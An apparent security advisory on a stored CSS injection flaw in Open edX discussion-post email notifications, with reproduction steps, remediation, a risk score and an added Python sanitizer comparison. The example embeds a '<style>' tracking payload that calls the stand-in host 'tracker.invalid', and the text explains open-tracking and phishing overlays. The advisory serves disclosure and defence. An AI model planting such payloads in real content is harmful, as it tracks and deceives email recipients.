Open edX Platform Stored CSS Injection Vulnerability in Email Notifications

Vulnerability

A stored CSS injection vulnerability has been identified in the Open edX Platform, affecting releases from 'sumac' onward. The issue lies in the HTML sanitizer function 'clean_thread_html_body()', which processes user-generated discussion-post content before it is embedded in email notifications. The sanitizer does not remove '<style>' elements, so any enrolled student can inject arbitrary CSS into a post. Because the sanitizer's output is rendered in the notification template with Django's 'safe' filter, nothing downstream escapes it and the injected CSS reaches recipients intact: it can reference remote resources (disclosing the recipient's IP address when the mail client fetches them), restyle or hide legitimate content, and overlay phishing content. The vulnerability has been patched in the 'ulmo', 'verawood', and 'master' versions.

Impact

Exploitation of this vulnerability allows an enrolled student to inject CSS into email notifications sent to other course participants. The injected CSS can be used to track email opens (disclosing the recipient's IP address to an attacker-controlled host), spoof content, and support phishing by manipulating how the email is displayed. The practical impact depends on the recipient's mail client: tracking requires a client that honors '<style>' blocks and fetches remote resources, and clients that proxy or block remote images reduce the IP disclosure but not the content manipulation.

Reproduction

To reproduce this vulnerability, an enrolled student creates a discussion post whose body contains a '<style>' element with CSS that references an attacker-controlled URL, for example as a background image or via '@import'. Once the post is published, any user who receives email notifications about discussion posts and opens the notification in a client that honors the stylesheet causes a fetch of that URL, revealing their IP address and the time the email was opened. A quick check for the fix is to pass a post body containing a '<style>' element through 'clean_thread_html_body()' and confirm that both the element and its contents are absent from the output.
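The following is an added example and not code from edx-platform: a stdlib-only allowlist sanitizer standing in for 'clean_thread_html_body()', shown next to the blocklist pattern that lets '<style>' through, fed a constructed post body of the kind described above. The host 'tracker.invalid' and the function names are hypothetical. It goes slightly beyond the advisory by also dropping inline 'style' attributes and non-http 'href' values, since an allowlist sanitizer for email bodies should remove every styling vector, not only '<style>'.

```python
# Added example, not code from edx-platform: a stdlib-only allowlist sanitizer
# standing in for clean_thread_html_body(), shown next to the blocklist pattern
# that lets <style> through. tracker.invalid is a hypothetical attacker host.
from html import escape
from html.parser import HTMLParser

# Constructed discussion-post body: a normal paragraph, a <style> block that
# makes the mail client fetch a remote image on open, and an inline style.
TRACKING_POST = (
    "<p>Quick question about assignment 2.</p>"
    '<style>body{background:url("https://tracker.invalid/open?u=victim")}</style>'
    '<p style="color:red">Thanks!</p>'
)

# Tags and attributes a discussion post legitimately needs in an email body.
ALLOWED_TAGS = {"p", "br", "b", "i", "em", "strong", "a", "ul", "ol", "li", "code", "pre"}
ALLOWED_ATTRS = {"a": {"href"}}
SAFE_HREF_SCHEMES = ("http://", "https://", "mailto:")


class Sanitizer(HTMLParser):
    """Rebuilds HTML from a parse, dropping what is not allowed.

    allowed_tags=None means 'keep every tag not in drop_with_content', which
    is the blocklist behaviour that misses <style>.
    """

    def __init__(self, allowed_tags, drop_with_content):
        super().__init__(convert_charrefs=True)
        self.allowed_tags = allowed_tags
        self.drop_with_content = drop_with_content
        self.out = []
        self._skip = 0  # nesting depth inside an element dropped with its content

    def _keep(self, tag):
        return self.allowed_tags is None or tag in self.allowed_tags

    def handle_starttag(self, tag, attrs):
        if tag in self.drop_with_content:
            self._skip += 1
            return
        if self._skip or not self._keep(tag):
            return
        kept = []
        for name, value in attrs:
            if self.allowed_tags is not None:
                if name not in ALLOWED_ATTRS.get(tag, ()):
                    continue  # drops style="..." and every other unlisted attribute
                if name == "href" and not (value or "").lower().startswith(SAFE_HREF_SCHEMES):
                    continue  # no javascript:/data: links
            if value is None:
                kept.append(f" {name}")
            else:
                kept.append(f' {name}="{escape(value, quote=True)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")

    def handle_startendtag(self, tag, attrs):
        self.handle_starttag(tag, attrs)  # <br/> becomes <br>, no stray </br>

    def handle_endtag(self, tag):
        if tag in self.drop_with_content:
            self._skip = max(0, self._skip - 1)
            return
        if self._skip or not self._keep(tag):
            return
        self.out.append(f"</{tag}>")

    def handle_data(self, data):
        if not self._skip:
            self.out.append(escape(data, quote=False))

    # Comments, doctypes and processing instructions are dropped by default.


def _run(html_body, allowed_tags, drop_with_content):
    s = Sanitizer(allowed_tags, drop_with_content)
    s.feed(html_body)
    s.close()
    return "".join(s.out)


def weak_clean(html_body):
    """Blocklist pattern: only <script> is removed, so <style> survives."""
    return _run(html_body, allowed_tags=None, drop_with_content={"script"})


def hardened_clean(html_body):
    """Allowlist pattern: unknown tags and all styling are removed."""
    return _run(html_body, allowed_tags=ALLOWED_TAGS, drop_with_content={"style", "script"})


def leaks_remote_css(html_body):
    """Regression check for the fix: True if a <style> element survives."""
    return "<style" in html_body.lower()


if __name__ == "__main__":
    print("weak    :", weak_clean(TRACKING_POST))
    print("hardened:", hardened_clean(TRACKING_POST))
```

The weak variant returns the post unchanged, stylesheet and all, which is exactly what a template marked 'safe' will then hand to the mail client; the hardened variant leaves only the two paragraphs. The 'leaks_remote_css()' check is the kind of assertion worth keeping in the notification tests after upgrading.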

Remediation

Operators should upgrade to the 'ulmo' or 'verawood' release, or to 'master', of the Open edX Platform to address this vulnerability. After upgrading, confirm that 'clean_thread_html_body()' strips '<style>' elements and their contents from discussion content before it reaches the notification template.

Added: May 11, 2026, 6:33 PM
Updated: May 11, 2026, 6:33 PM

Vulnerability Rating

Custom Algorithm
spread: 2.2
impact: 0.4
exploitability: 6.2
remediation: 7.7
relevance: 8.0
threat: 4.8
urgency: 2.9
incentive: 0.0

Our algorithm analyzes dozens of metrics to generate these 8 key vulnerability categories, which are then combined to calculate the overall risk score.